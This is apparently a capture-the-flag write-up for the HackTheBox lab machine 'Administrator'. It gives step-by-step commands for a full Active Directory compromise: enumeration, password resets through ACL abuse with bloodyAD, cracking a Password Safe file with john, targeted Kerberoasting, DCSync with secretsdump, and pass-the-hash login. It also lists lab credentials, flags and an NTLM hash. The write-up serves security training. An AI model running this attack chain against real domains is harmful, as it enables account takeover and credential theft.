This box simulates a realistic domain environment with multiple users and privilege escalation paths. You’re provided with initial low-privileged credentials (Olivia:ichliebedich) and work your way up to a full domain compromise. Key highlights include using ACL misconfigurations to reset passwords, enumerating FTP for secrets, cracking a password manager file with john, leveraging BloodHound for access control visualization, and executing a targeted Kerberoasting attack to capture a service account hash with DCSync rights for full domain admin access.
nmap -p- administrator.htb --min-rate 10000
nmap -p 21,53,88,... -sCV administrator.htb -oN nmapscan
Revealed common AD services: FTP, SMB, LDAP, Kerberos, WinRM.
You start with credentials:
Username: Olivia
Password: ichliebedich
nxc smb administrator.htb -u Olivia -p ichliebedich
nxc winrm administrator.htb -u Olivia -p ichliebedich
Enumerated RID brute forcing with nxc:
nxc smb administrator.htb -u Olivia -p ichliebedich --rid-brute | grep SidTypeUser
Collected users: michael, benjamin, emily, ethan, alexander, emma, etc.
bloodhound-python -u Olivia -p ichliebedich -d administrator.htb -ns 10.10.11.42 -c All
Olivia has GenericAll over michael → reset his password
Michael has password reset rights on benjamin → reset again
bloodyAD -u olivia ... set password Michael ...
bloodyAD -u Michael ... set password Benjamin ...
nxc ftp administrator.htb -u Benjamin -p Password123
ftp> get Backup.psafe3
Converted to john hash:
pwsafe2john Backup.psafe3 > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Cracked password: tekieromucho
Used PasswordSafe GUI to reveal:
evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Captured user.txt:
4d479030c20afac8ee4ad1b7757959a6
Emily has GenericWrite over ethan
python targetedKerberoast.py -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb ...
Time sync fix:
sudo rdate -n administrator.htb
Password recovered: limpbizkit
impacket-secretsdump administrator.htb/ethan:limpbizkit@dc.administrator.htb
Captured NTLM hash for Administrator:
3dc553ce4b9fd20bd016e098d2d2fd2e
Logged in as Administrator:
evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Got root.txt:
66cd2c404066adec0d050d2610a64c36
BloodHound for privilege relationships.bloodyAD to reset passwords.Password Safe files using john.Kerberoasting, DCSync, and impacket-secretsdump.✍️ Writeup by inksec
🔗 https://github.com/inkedqt